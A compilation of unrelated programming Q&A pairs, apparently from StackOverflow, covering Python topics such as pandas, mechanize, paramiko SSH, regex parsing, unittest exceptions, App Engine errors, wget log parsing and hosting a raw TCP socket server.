python pandas dataframe from file Question: I want to create a dataframe object from a file. The file looks something similar to this Gibberish Header1 Gibberish Header2 Gibberish Header3 Gibberish Header4 (etc)... TAG THING_I_WANT_AS_COLUMN_NAME Column1 1.0 # I'll want this index as data 1 1.2 # I'll want this index as data 2 1.3 etc TAG THING_I_WANT_AS_COLUMN_NAME Column2 1.1 1.1 1.7 I would want the DataFrame to look similar to: Column_1 Column_2 data1 1.0 1.1 data2 1.2 1.1 data3 1.3 1.7 Is there a way to do this without writing a function to turn this into a dictionary that can be write directly into the DataFrame class? I was thinking possibly reshape, but I'm not really sure how that would work in my case. I know writing it to a dict is an easy thing to do, but these files can be quite large, so it might dramatically slow me down and even not be possible with my RAM. Any help, even a point in the right direction would be greatly appreciated. Thanks! Answer: When creating a pandas dataframe from scratch I usually do... import pandas as pd # create array for each column col1 = [float(35*x) for x in xrange(10)] col2 = [float(220*x) for x in xrange(10)] dict = {'col1_name': col1, 'coll2_name': col2} df = pd.DataFrame(dict) Like the other people have said, you'll have to parse the data first. It's hard to say exactly what without seeing the actual data. You could potentially loop over each line in the file, ignore headers, once you hit the line with column name and stuff set a flag. Then you can start appending values to an array. Once you've got both sets of numbers in arrays, build a dictionary like I did up there and you'll have a dataframe!
Python - Mechanize input text in form Question: I'd like to input some text in the text field of a form. This is my current code. What should I do next? import re from mechanize import Browser br = Browser() br.open("xyz.com") formcount=0 for frm in br.forms(): if str(frm.attrs["id"])=="xyz": break formcount=formcount+1 br.select_form(nr=formcount) ## What should I code here to input text into the form? response = br.submit() Answer: br.form['id'] = 'ss-form' # This does the input br.submit() # This will submit the form print br.response().read() # This will read the new page returned try a `print br.response().read()`. It that is what you want, you can parse the response with Beautiful Soup. `soup = BeautifulSoup(br.response().read())`
nbconvert markdown not searching predefined images Question: I was wondering why ipython nbconvert --to markdown not searching the image in directory first. If i do this in my tes.ipynb: from Ipython.display import Image Image('tes_files/1.jpg') then if i execute command ipython nbconvert tes.ipynb --to markdown --stdout what i will get the output is from IPython.display import Image Image('tes_files/1.jpg') ![jpeg](tes_files/tes_0_0.jpeg) Why nbconvert not searching for the path specified by the path first, then if it doesn't exist, generate a new one? I know maybe there's some idea that we can import image from all directory and with nbconvert, markdown just gathering it into one folder. Is there another option command? Do i have to create a new profile? ## UPDATE: Suppose I have set the url path for the image folders: > IMG_FOLDERS = '../galleries/tes_files' and set the url path to that directory. At some point, I create a plot. Then when I execute nbconvert, it just create a new folder 'name'_files, same dir as the ipynb, and create a new image based on the plot inside it. How to tell the nbconvert not to create a new directory, but instead, use IMG_FOLDERS? Thanks Answer: The issue here, is that the IPython `Image` class embeds the image data into the notebook if you use it like you did in your example. Embedded images are extracted by a preprocessor from the notebook and finally included in the markdown, latex, etc. document during the conversion. So what you are looking for is a way to link an image to the notebook, which is still possible with the `Image` class. If you check the documentation for the `Image` class (IPython 2.3) you will find: Init definition: Image(self, data=None, url=None, filename=None, format=u'png', embed=None, width=None, height=None, retina=False) ... Parameters ---------- data : unicode, str or bytes The raw image data or a URL or filename to load the data from. This always results in embedded image data. url : unicode A URL to download the data from. If you specify `url=`, the image data will not be embedded unless you also specify `embed=True`. filename : unicode Path to a local file to load the data from. Images from a file are always embedded. Hence, to get the image not embedded but rather linked, you have to use the `url` argument like: Image(url='tes_files/1.jpg') There, is also an `embed` argument but this doesn't seem to work with the filename argument.
Start a process on another computer on the network Question: I'm required to start a series of python scripts and/or other windows executables. Some of these require a Windows system, others require a Linux machine. Currently there are designated machines to run the OS-dependent programs. So I know where I want to start which program. Is there a way to start a python script (or a windows executable) from a python script, on the local network, on another computer (e.g. run `192.168.0.101:/dir/python_script_123.py`? The script, which should then run various programs may then look something like this in _pseudo code_.. linuxip = 192.168.0.101 linuxparam = "required parameter" winip = 192.168.0.201 winparam = "required parameter" #option 1 (run all), 2(run linux only), 3(run windows only), 4(run local only) option = 1 if option == 1: magic_things.run("linuxip:/dir/linux_script.py" + linuxparam) magic_things.run("winip:C:\\dir\\windows_prog.exe" + winparam) subprocess.call(["/dir/local_script.py","parameter"]) subprocess.call(["/dir/another_local_script.py","parameter"]) elif option ==2: [...] Answer: You need to connect to your client machines in any way. In chase of the linux machine you could use SSH. see <http://en.wikipedia.org/wiki/Secure_Shell> Assuming you have a ssh server on the linux client running you could use the package paramiko (<http://docs.paramiko.org/en/1.15/api/client.html>) to connect to the machine and run your script there. This could look something like this: from paramiko.client import SSHClient client = SSHClient() client.load_system_host_keys() client.connect('linuxip', username='your_user', password='very_secret') stdin, stdout, stderr = client.exec_command('python /home/your_user/your/path/to/scripty.py') However please note that its not very secure to store passwords in scripts and you probably do better with a public/private key authentication (See the wiki article). The paramiko package also offers the option for an ssh server, so this might be a solution for your windows machine, but I am very much not shure as I don't run any windows any more. Hope this was helpful! David
How to debug ImportEror "No Module named ..." Question: I am using Django Rest Framework. When I try to go to the swagger docs page, I am getting ImportError: No module named drf_compound_fields from serializers.py where I try to import the following from drf_compound_fields.fields import ListField I have drf-compound-field 0.2.2 in my virtualenv and I ran pip list command to make sure that it is installed. Here is what I get from manage.py shell Python 2.7.6 (default, Mar 22 2014, 22:59:56) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. (InteractiveConsole) >>> >>> >>> >>> >>> from drf_compound_fields.fields import ListField Traceback (most recent call last): File "<console>", line 1, in <module> ImportError: No module named drf_compound_fields.fields >>> Thanks for your help!! Answer: drf-compound-fields was installed under the same virtualenv where the django server was being run from. Apparently it needs to be installed at the system level and not necessarily at the virtualenv level. Following steps worked for me: 1) Get out of virtualenv. 2) pip install def-compound-fields 3) get in virtualenv and start django process
How does one create iterateable lists of objects in C++? Question: I'm starting out C++ coming from Python, so I'm pretty much just scrolling through the basics. Problem occurs when I try to make an array with objects in it. In Python I would have a class Car with the attributes `color` and `year`: myCars = [Car("Red", 1986), Car("Black", 2007), Car("Blue", 1993)] # and then going through the cars: for car in myCars: print("The car has the color " + car.color + " and is " + (2014 - car.year) + " years old.") Trying to do something similar in C++: struct Car { string color; int year; }; int cars[3] = {Car cars[0], Car cars[1], Car cars[2]} //EDIT: I wrote bilar but I meant cars. but it is indeed uninteresting to iterate over these cars, as for one, this doesn't work, and secondly, they doesn't have any attributes. I just don't understand, I think maybe I've missed something important and got it all wrong, but then, I reckon I just gotta have this explained clean and nice. Answer: Try this (C++11) - looks almost like Python: std::vector<Car> cars = {{"Red", 1986}, {"Black", 2007}, {"Blue", 1993}}; for (const Car& car : cars) { std::cout << "The car has the color " << car.color << " and is " << (2014 - car.year) << " years old." << std::endl; } C++ constructs involved: * [`std::vector`](http://en.cppreference.com/w/cpp/container/vector) * [list initialization](http://en.cppreference.com/w/cpp/language/list_initialization) * [range `for` loop](http://en.cppreference.com/w/cpp/language/range-for)
How to install aggdraw with Python 2.7 Question: I'd like to use aggdraw with Python 2.7. (Is this a dumb idea anyway? I've seen a nice aggdraw example, but I don't want to regress to Python 2.6. Is there an equivalent drawing library working with Python 2.7?) I have Python 2.7.8 64bit installed on a Windows 7 Enterprise SP 1 64bit. The installer at <http://www.effbot.org/downloads#aggdraw> complains about Python 2.6 missing, and `python setup.py install` complains about a missing `vcvarsall.bat`. So, following all the related posts here, I installed the MS compiler from <http://www.microsoft.com/en-us/download/details.aspx?id=44266>. It's visible in the "Programs and Features" list, and I have a `vcvarsall.bat` in `C:\Users\d031475\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0` now. Still, `python setup.py install` neither runs in CMD directly, nor in the `MS Visual... Compiler for Python 2.7` command prompt which appeared in my Start menu. It still complains about a missing `vcvarsall.bat`. EDIT: Even when I append the relevant directory to my path, so that I can run `vcvarsall.bat` from the command line, `python setup.py install` still complains it can't find it. How strange is that? Answer: To build with "Microsoft Visual C++ Compiler for Python 2.7" you need to use [setuptools >= 6.0](https://pypi.python.org/pypi/setuptools) instead of distutils. Try to change the line `from distutils.core import setup, Extension` in `setup.py` to `from setuptools import setup, Extension`. You'll need to build against the [freetype library](http://www.freetype.org/) to enable text rendering. The aggdraw project appears to be abandoned. The latest [version 1.2a3](http://svn.effbot.org/public/aggdraw/) is from early 2006 and predates Python 2.7, 64 bit, and Pillow. Expect crashes, especially on 64 bit for Windows. Unofficial Windows binaries for aggdraw are available at <http://www.lfd.uci.edu/~gohlke/pythonlibs/#misc>. An alternative to aggdraw is [pycairo](http://cairographics.org/pycairo/) ([Windows binaries](http://www.lfd.uci.edu/~gohlke/pythonlibs/#pycairo)).
Compare two CSV files and print the rows that are different Python Question: I'm trying to compare two csv files that are like below English.csv i am is was were Dictionary.csv i,insomnia d,disease bc,breast cancer I'm trying to compare the first columns in two files and print the rows that are different from Dictionary.csv like below final.csv d,disease bc,breast cancer I tried this code. import csv with open('English.csv', 'rb') as csvfile1: with open ("Dictionary.csv", "rb") as csvfile2: reader1 = csv.reader(csvfile1) reader2 = csv.reader(csvfile2) rows1 = [row for row in reader1] rows2 = [row for row in reader2] col_a = [row1[0] for row1 in rows1] col_b = [row2[0] for row2 in rows2] col_c = [row2[1] for row2 in rows2] only_b = [text for text in col_b if not text in col_a] I can get data from first column that is different, but not from the second column like below. How can I get the corresponding data from second column? >>>only_b ['d','bc'] Answer: Not sure how effective is this but IMO does what you want: import csv with open('English.csv', 'rb') as csvfile1: with open ("Dictionary.csv", "rb") as csvfile2: reader1 = csv.reader(csvfile1) reader2 = csv.reader(csvfile2) rows1_col_a = [row[0] for row in reader1] rows2 = [row for row in reader2] only_b = [] for row in rows2: if row[0] not in rows1_col_a: only_b.append(row) print only_b Outputs: [['d', 'disease'], ['bc', 'breast cancer']]
Search a delimited string in a file - Python Question: I have the following read.json file {:{"JOL":"EuXaqHIbfEDyvph%2BMHPdCOJWMDPD%2BGG2xf0u0mP9Vb4YMFr6v5TJzWlSqq6VL0hXy07VDkWHHcq3At0SKVUrRA7shgTvmKVbjhEazRqHpvs%3D-%1E2D%TL/xs23EWsc40fWD.tr","LAPTOP":"error"} and python script : import re shakes = open("read.json", "r") needed = open("needed.txt", "w") for text in shakes: if re.search('JOL":"(.+?).tr', text): print >> needed, text, I want it to find what's between two words (JOL":" and .tr) and then print it. But all it does is printing all the text set in "read.json". Answer: You're calling `re.search`, but you're not doing anything with the returned match, except to check that there is one. Instead, you're just printing out the original `text`. So of course you get the whole line. The solution is simple: just store the result of `re.search` in a variable, so you can use it. For example: for text in shakes: match = re.search('JOL":"(.+?).tr', text) if match: print >> needed, match.group(1) In your example, the match is `JOL":"EuXaqHIbfEDyvph%2BMHPdCOJWMDPD%2BGG2xf0u0mP9Vb4YMFr6v5TJzWlSqq6VL0hXy07VDkWHHcq3At0SKVUrRA7shgTvmKVbjhEazRqHpvs%3D-%1E2D%TL/xs23EWsc40fWD.tr`, and the first (and only) group in it is `EuXaqHIbfEDyvph%2BMHPdCOJWMDPD%2BGG2xf0u0mP9Vb4YMFr6v5TJzWlSqq6VL0hXy07VDkWHHcq3At0SKVUrRA7shgTvmKVbjhEazRqHpvs%3D-%1E2D%TL/xs23EWsc40fWD`, which is (I think) what you're looking for. However, a couple of side notes: First, `.` is a special pattern in a regex, so you're actually matching anything up to _any character_ followed by `tr`, not `.tr`. For that, escape the `.` with a `\`. (And, once you start putting backslashes into a regex, use a raw string literal.) So: `r'JOL":"(.+?)\.tr'`. Second, this is making a lot of assumptions about the data that probably aren't warranted. What you really want here is not "everything between `JOL":"` and `.tr`", it's "the value associated with key `'JOL'` in the JSON object". The only problem is that this isn't quite a JSON object, because of that prefixed `:`. Hopefully you know where you got the data from, and therefore what format it's actually in. For example, if you know it's actually a sequence of colon-prefixed JSON objects, the right way to parse it is: d = json.loads(text[1:]) if 'JOL' in d: print >> needed, d['JOL'] Finally, you don't actually have anything named `needed` in your code; you opened a file named `'needed.txt'`, but you called the file object `love`. If your real code has a similar bug, it's possible that you're overwriting some completely different file over and over, and then looking in `needed.txt` and seeing nothing changed each time…
Python sockets not responsered Question: my code send a http request using sockets and then save the response.It works for me yesterday, but today i cant receive response. I need to use sockets not httplib or urllib. I dont know if code is not working or my python install is crazy. thanks! import socket import logging def get_http(target, port, request): """ Method that sends an HTTP request and returns the response :param target: :type target: :return: :rtype: str """ try: s = socket.create_connection((target, port)) s.sendall(request.encode()) response = repr(s.recv(2024).decode()) except socket.error as e: logging.error('Failed to create connection: %s', e.strerror) return response * * * import lib.netgrab as n class Probe(): def __init__(self): super(Probe, self).__init__() def prueba(self): n.get_http('www.website.com', 80, 'HEAD / HTTP/1.1\r\n\r\n') pr = Probe() re = pr.prueba() print(re) Answer: You have forgot your return statement, please update: def prueba(self): return n.get_http('www.website.com', 80, 'HEAD / HTTP/1.1\r\n\r\n')
Python Guessing Game Correct answer being printed even when player gets answer right Question: So I have recently started programming python and I have one issue with this code. When the player gets the answer incorrect after using all their lives it should print the answer which it does but only the first time the layer plays i they play again they don't get told the correct answer if the get it wrong. It also does this when the player gets the answer correct. Plus the number the computer chooses stays the same when you use the play again function. Please try and help me but bear in mind my understanding cane be very limited in some aspects of python. I've included lots of comments to help others understand whats going on. I have included my code and what I get in the shell. Code: #imports required modules import random from time import sleep #correct number variable created num = 0 #generates number at random comp_num = random.randint(1,10) print('I\'m thinking of a number guess what it is...\n') #main game code def main(): #lives created lives = 3 #correct number variable reset num = 0 while lives >= 1: #player guesses guess = int(input('Guess: ')) if comp_num == guess: #if correct says well done input('\nWell Done! You guessed Correctly!\n') #player doesn't get told what the number is if there right num = num +1 break elif comp_num >= guess: #if guess is too low tells player #one live taken for incorrect guess lives = lives -1 print('\nToo low!\n') #player is told how many lives they have left print('You guessed incorrectly. You have',lives,'live(s) remaining.\n') elif comp_num <= guess: #if guess is too high tells player #one live taken for incorrect guess lives = lives -1 print('\nToo high!\n') #player is told how many lives they have left print('You guessed incorrectly. You have',lives,'live(s) remaining.\n') def end(): #asks player if they want to play again play_again = input('Would you like to play again?[Y/N] ') while play_again.lower() == 'y': #if they do game resets and plays again if play_again.lower() == 'y': comp_num = random.randint(1,10) print('\nI\'m thinking of a number guess what it is...\n') main() play_again = input('Would you like to play again?[Y/N] ') if play_again.lower() == 'n': break if play_again.lower() == 'n': #if they don't game ends input('\nOk, Press enter to exit') exit() main() if num != 1: #if player guesses incorrectly they get told the correct awnser print('The number I was thinking of was...',comp_num,'!\n') end() SHELL: I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! The number I was thinking of was... 5 ! Would you like to play again?[Y/N] y I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! Would you like to play again?[Y/N] y I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! Would you like to play again?[Y/N] y I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! Answer: The problem with your function is that you have a global variable named `num`, but your `main` function also has a local variable named `num`. The `num += 1` line inside `main` only changes the local variable. But the `if num != 1` at the end checks the global variable. To fix this, add a global statement: def main(): global num # the rest of your code * * * Why does this work? In Python, any time you write an assignment statement (like `num = 0` or `num += 1`) in a function, that creates a local variable—unless you've explicitly told it not to, with a `global` statement.* So, adding that `global num` means that now, there is no local variable `num`, so `num += 1` affects the global instead. This is explained in more detail in the tutorial section on [Defining Functions](https://docs.python.org/3/tutorial/controlflow.html#defining- functions). * Or a `nonlocal` statement, but you don't want to learn about that yet. * * * However, there's a better way to fix this. Instead of using a global variable, you can `return` the value in the local variable. Like this: def main(): # your existing code return num # your other functions score = main() if score != 1: #if player guesses incorrectly they get told the correct awnser print('The number I was thinking of was...',comp_num,'!\n')
Exception raising does not reflect in test case even though raised as seen in logs Question: I'm practicing TDD in Python and came across a problem in testing whether an exception is raised. Here is my `test_phonebook.py` with `test_add_empty_name_raises_exception` which fails. import unittest import phonebook class Test(unittest.TestCase): def test_add_empty_name_raises_exception(self): self.assertRaises(ValueError, phonebook.add, "", "1111111111") if __name__ == "__main__": # import sys;sys.argv = ['', 'Test.testName'] unittest.main() Below is my `phonebook.py` with the method `add` which adds the data into the dictionary. import re _phonebook = {} file_name = "phonebook.txt" def is_valid_name(name): return re.search(r"([A-Z][a-z]*)([\\s\\\'-][A-Z][a-z]*)*", name) is not None def is_valid_number(number): return re.search(r"\+?[\d ]+$", number) is not None def add(name, number): try: if is_valid_name(name) and is_valid_number(number): _phonebook[name] = number else: raise ValueError("Invalid arguments.", name, number) except ValueError as err: print err.args if __name__ == '__main__': pass My problem is that the test fails even though it is seen in the console log that there was a `ValueError` raised within the `add` method. Finding files... done. Importing test modules ... done. ('Invalid arguments.', '', '1111111111') ====================================================================== FAIL: test_add_empty_name_raises_exception (path.to.phonebook.test_phonebook.Test) ---------------------------------------------------------------------- Traceback (most recent call last): File "path\to\phonebook\test_phonebook.py", line 13, in test_add_empty_name_raises_exception self.assertRaises(ValueError, phonebook.add, "", "1111111111") AssertionError: ValueError not raised ---------------------------------------------------------------------- Ran 1 test in 0.002s How do I solve this? I there something I forgot? I also tried using the new format for handling exceptions in tests in Python 2.7 but it still hasn't caught the `ValueError` raising. def test_add_empty_name_raises_exception(self): with self.assertRaises(ValueError): self.phonebook.add("", "1111111111) I also changed the form of the test case into using lambdas but still no changes. def test_add_empty_name_raises_exception(self): self.assertRaises(ValueError, lambda: phonebook.add("", "1111111111")) I also cleaned my directory and restarted Eclipse Luna and problem still persists. **Possible solution** I was reading the [8.Errors and Exceptions](https://docs.python.org/2/tutorial/errors.html) documentation and got to the "[Raising Exceptions](https://docs.python.org/2/tutorial/errors.html#raising- exceptions)" part which states that: If you need to determine whether an exception was raised but don’t intend to handle it, a simpler form of the raise statement allows you to re-raise the exception: I added this to the existing `add` method as such: def add(name, number): try: if is_valid_name(name) and is_valid_number(number): _phonebook[name] = number print "Added %s:\t%s" % (name, number) else: raise ValueError("Invalid arguments.", name, number) except ValueError as err: print err.args raise Which caused the test case to pass. Is this the correct way? To call `raise` again in the `except` block? Answer: When you catch an exception (in your `except ValueError as err:` block), you prevent it from continuing back up the call stack to eventually terminate the program. Essentially, you're saying "I know how to handle this, so no need to panic anyone else." Re-raising an exception is the proper thing to do if you caught the exception but didn't do so to actually _fix_ anything, for instance, to log that it occurred. Typically, though, one catches an exception in order to correct it. In your case, you're catching the exception almost immediately after you yourself raised it. Why not put your logging statement in the same `else` block as the `raise`? No need for a `try: ... except:` indent at all. def add(name, number): if is_valid_name(name) and is_valid_number(number): _phonebook[name] = number print "Added %s:\t%s" % (name, number) else: print "Invalid arguments.", name, number raise ValueError("Invalid arguments.", name, number) return
Using User Input to control parameters in a Random number Generator Question: I am attempting to write a program that generates random numbers, asks how big you want it, between 1-4 for example, then I want it to ask how many numbers you want and finally ask you if you want to run it again. I am attempting to grasp the concepts of recursion and type casting, just trying to learn the concepts of Object Orientated Design with Python. I tried to glean from what I have read so far on the Learn Python Hard Way site. from random import randint def random_with_N_digits(n): range_start = 10**(n-1) range_end = (10**n)-1 return randint(range_start, range_end) # Here I am attempting to define the variables I need to convert keyboard input to int size = raw_input() intsize = # unsure of how to define this variable intsize = int(size) print "How many Digits?", size = raw_input() print "How many Times?". times = raw_input() # I want to construct a method here that sends my size input to random_with_N_digits(n) # I need a method that runs the random_with_N_digits according to the input. # while True: reply = input('Enter text:') if reply == 'stop': break if reply = times # not sure what to put here print( def random_with_N_digits) else: # I want to tell the my method to run as many as much as 'times' is equal to print "Again?" answerMe = raw_input() # here I want to have a if answerMe = Enter run the method again print random_with_N_digits() Answer: try this code from random import randint def random_with_N_digits(n): s = int(raw_input("starting from.. ")) e = int(raw_input("upto... ")) l = "" for i in range(0,n): l= l +str( randint(s,e)) print int(l) again = raw_input("print again?") if again == "yes": how_many =int(raw_input("how many digits?")) random_with_N_digits(how_many) how_many =int(raw_input("how many digits?")) random_with_N_digits(how_many)
GoogleAppEngineLauncher: database disk image is malformed Question: I've written a small application for Google App Engine and each time I want to run my app I have the following error: *** Running dev_appserver with the following flags: --skip_sdk_update_check=yes --port=13080 --admin_port=8005 --clear_datastore=yes Python command: /usr/bin/python2.7 INFO 2014-11-22 07:47:57,008 devappserver2.py:745] Skipping SDK update check. Traceback (most recent call last): File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/dev_appserver.py", line 83, in <module> _run_file(__file__, globals()) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/dev_appserver.py", line 79, in _run_file execfile(_PATHS.script_file(script_name), globals_) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 997, in <module> main() File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 990, in main dev_server.start(options) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 789, in start request_data, storage_path, options, configuration) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 888, in _create_api_server default_gcs_bucket_name=options.default_gcs_bucket_name) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/api_server.py", line 403, in setup_stubs logservice_stub.LogServiceStub(logs_path=logs_path)) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/api/logservice/logservice_stub.py", line 107, in __init__ self._conn.execute(_REQUEST_LOG_CREATE) sqlite3.DatabaseError: database disk image is malformed When I run an other application I've created, I don't have any error. I tried some basic ideas: * delete/re-add the app * remove the app launcher and reinstall it * reboot the mac * locate where the database could be with some grep Nothing worked. Any idea? Answer: The default log database filename is `log.db`. It is stored in your app storage directory, which by default is located in your `tempfile.gettempdir()` directory, named `appengine.[appname].[userid]`. The `appname` portion takes the value from your `app.yaml` (look for the `application` entry), replaces `:` colons with underscores, and removes everything before the last `~` tilde (if there is any). So if your app is called `foobar` and your username is `jbj`, the corrupted SQLite database is located in: `python -c 'import tempfile;print tempfile.gettempdir()'`/appengine.foobar.jbj/log.db On Mac OS X, `tempfile.gettempdir()` returns a hashed path under `/var/folders` somewhere; it is simply taken from the `TMPDIR` environment variable, so you _should_ just be able to use: rm $TMPDIR/appengine.foobar.jbj/log.db You can safely delete this file, it'll be re-created the next time you start the app.
Parse wget log file in python Question: I have a wget log file and would like to parse the file so that I can extract relevant info for each log entry. E.g IP address, timestamp, URL, etc. A sample log file is printed below. The number of lines and detail of information is not identical for each entry. What is consistent is the notation of each line. I am able to extract individual lines but I want a multidimensional array (or similar): import re f = open('c:/r1/log.txt', 'r').read() split_log = re.findall('--[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}.*', f) print split_log print len(split_log) for element in split_log: print(element) ####### Start log file example 2014-11-22 10:51:31 (96.9 KB/s) - `C:/r1/www.itb.ie/AboutITB/index.html' saved [13302] --2014-11-22 10:51:31-- http://www.itb.ie/CurrentStudents/index.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/CurrentStudents/index.html' 0K .......... ....... 109K=0.2s 2014-11-22 10:51:31 (109 KB/s) - `C:/r1/www.itb.ie/CurrentStudents/index.html' saved [17429] --2014-11-22 10:51:32-- h ttp://www.itb.ie/Vacancies/index.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Vacancies/index.html' 0K .......... .......... .. 118K=0.2s 2014-11-22 10:51:32 (118 KB/s) - `C:/r1/www.itb.ie/Vacancies/index.html' saved [23010] --2014-11-22 10:51:32-- h ttp://www.itb.ie/Location/howtogetthere.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Location/howtogetthere.html' 0K .......... ....... 111K=0.2s Answer: Here's how you can extract the data you want and store it in a list of tuples. The regexes I've used here aren't perfect, but they work ok with your sample data. I modified your original regex to use the more readable `\d` instead of the equivalent `[0-9]`. I've also used raw strings, which generally makes working with regexes easier. I've embedded your log data into my code as a triple-quoted string so I don't have to worry about file handling. I noticed that there are spaces in some of the URLs in your log file, eg `h ttp://www.itb.ie/Vacancies/index.html` but I assume that those spaces are an artifact of copy & pasting and they don't actually exist in the real log data. If that's not the case, then your program will need to do extra work to cope with such extraneous spaces. I've also modified the IP addresses in the log data, so they aren't all identical, just to make sure that each IP found by `findall` is getting properly associated with the correct timestamp & URL. #! /usr/bin/env python import re log_lines = ''' 2014-11-22 10:51:31 (96.9 KB/s) - `C:/r1/www.itb.ie/AboutITB/index.html' saved [13302] --2014-11-22 10:51:31-- http://www.itb.ie/CurrentStudents/index.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/CurrentStudents/index.html' 0K .......... ....... 109K=0.2s 2014-11-22 10:51:31 (109 KB/s) - `C:/r1/www.itb.ie/CurrentStudents/index.html' saved [17429] --2014-11-22 10:51:32-- http://www.itb.ie/Vacancies/index.html Connecting to www.itb.ie|193.1.36.25|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Vacancies/index.html' 0K .......... .......... .. 118K=0.2s 2014-11-22 10:51:32 (118 KB/s) - `C:/r1/www.itb.ie/Vacancies/index.html' saved [23010] --2014-11-22 10:51:32-- http://www.itb.ie/Location/howtogetthere.html Connecting to www.itb.ie|193.1.36.26|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Location/howtogetthere.html' 0K .......... ....... 111K=0.2s ''' time_and_url_pat = re.compile(r'--(\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2})--\s+(.*)') ip_pat = re.compile(r'Connecting to.*\|(.*?)\|') time_and_url_list = time_and_url_pat.findall(log_lines) print '\ntime and url\n', time_and_url_list ip_list = ip_pat.findall(log_lines) print '\nip\n', ip_list all_data = [(t, u, i) for (t, u), i in zip(time_and_url_list, ip_list)] print '\nall\n', all_data, '\n' for t in all_data: print t **output** time and url [('2014-11-22 10:51:31', 'http://www.itb.ie/CurrentStudents/index.html'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Vacancies/index.html'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Location/howtogetthere.html')] ip ['193.1.36.24', '193.1.36.25', '193.1.36.26'] all [('2014-11-22 10:51:31', 'http://www.itb.ie/CurrentStudents/index.html', '193.1.36.24'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Vacancies/index.html', '193.1.36.25'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Location/howtogetthere.html', '193.1.36.26')] ('2014-11-22 10:51:31', 'http://www.itb.ie/CurrentStudents/index.html', '193.1.36.24') ('2014-11-22 10:51:32', 'http://www.itb.ie/Vacancies/index.html', '193.1.36.25') ('2014-11-22 10:51:32', 'http://www.itb.ie/Location/howtogetthere.html', '193.1.36.26') This last part of this code uses a list comprehension to reorganize the data in the time_and_url_list and the ip_list into a single list of tuples, using the `zip` built-in function to process the two lists in parallel. If that part's a bit hard to follow, please let me know & I'll try to explain it further.
Raw TCP Listen Socket on Cloud or Web Server Question: I have hardware that connects to raw TCP socket on any given IP and port combination. It then continually sends characters. The following piece of Python code may give you an idea of what the hardware does. import socket serverIP = '*server IP or domain*' serverPort = 60000 Sock = socket(AF_INET, SOCK_STREAM) Sock.connect((serverIP, serverPort)) while (1): f = open ("send-data.txt","r") while 1: c = f.readline() if not c: break Sock.send(c + '\n') Sock.shutdown(0) Sock.close() When this code is run it exactly behaves like my hardware system. The `send- data.txt` file contains characters similar to what hardware sends. I have written a socket server in Python using `SocketServer` library. It allows connections, receives character stream, and stores it into a local (newly created) file. Currently, I am running this code on my system, as `localhost` and it works. I would like to serve these files through a webpage. I want to be able to do the same on remote server. As you can see, my hardware limits me to use only raw TCP sockets. From what I understand, I'll need low- level access to the server machine like IaaS. I tried [pythonanywhere](https://www.pythonanywhere.com), but I guess they don't allow simple python sockets. Heroku also requires you to write a web app, and I don't know how to go about that or whether it'll work with my hardware. What hosting/Cloud solution out there could act as above-mentioned socket server and also as HTTP server which would later serve these files and webpages. Answer: If I understand your question correctly, you'd like to know which affordable hosting solution would allow you to communicate via arbitrary TCP sockets. The answer is simple: Pretty much any VPS (Virtual Private Server) company or IaaS provider. Since you tagged your question with Amazon-EC2, yes they do too, but the learning curve to get your first instance running and the security groups (read: firewall rules, which live outside your VM) configured, is rather steep. That said, you do have a so-called "Free Tier" there for one year, which enables you to try out most of their services free-of-charge. Other providers might be more suitable. (I'm not sure if it's allowed to suggest providers here, but you could for example look at Linode or Rackspace Cloud; they offer much less flexibility than EC2, but it's a whole lot easier to get started.) As with any IaaS option, it would be beneficial to know Linux, networking and some security basics (at the very least) as you will be solely responsible for the things you create. Talking about security... If that piece of code you posted has a similarly rudimentary receiving end, you're setting yourself up for trouble as soon as it's out there in public, as the communication is done in plain text [*] and doesn't seem to require any kind of authentication. Anybody could probably telnet to the receiving end and just inject some lines of text? (That's exactly why considerably sane PaaS providers often don't let you communicate over arbitrary ports and sockets :-) ) [*] I am guessing that, because you use readline. If any encryption was involved, you'd likely write/read in chunks of bytes.
